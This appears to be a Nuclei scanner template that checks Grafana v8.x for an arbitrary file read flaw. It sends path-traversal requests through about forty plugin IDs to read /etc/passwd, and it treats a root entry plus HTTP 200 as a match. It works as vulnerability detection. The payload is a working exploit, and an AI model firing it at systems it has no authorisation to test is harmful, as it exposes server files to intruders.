id: grafana-file-read

info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk,jeya.seelan
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - hhttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://twitter.com/naglinagli/status/1468155313182416899
  tags: grafana,lfi,fuzz

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
      plugin-id:
        - alertlist
        - annolist
        - barchart
        - bargauge
        - candlestick
        - cloudwatch
        - dashlist
        - elasticsearch
        - gauge
        - geomap
        - gettingstarted
        - grafana-azure-monitor-datasource
        - graph
        - heatmap
        - histogram
        - influxdb
        - jaeger
        - logs
        - loki
        - mssql
        - mysql
        - news
        - nodeGraph
        - opentsdb
        - piechart
        - pluginlist
        - postgres
        - prometheus
        - stackdriver
        - stat
        - state-timeline
        - status-history
        - table
        - table-old
        - tempo
        - testdata
        - text
        - timeseries
        - welcome
        - zipkin

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200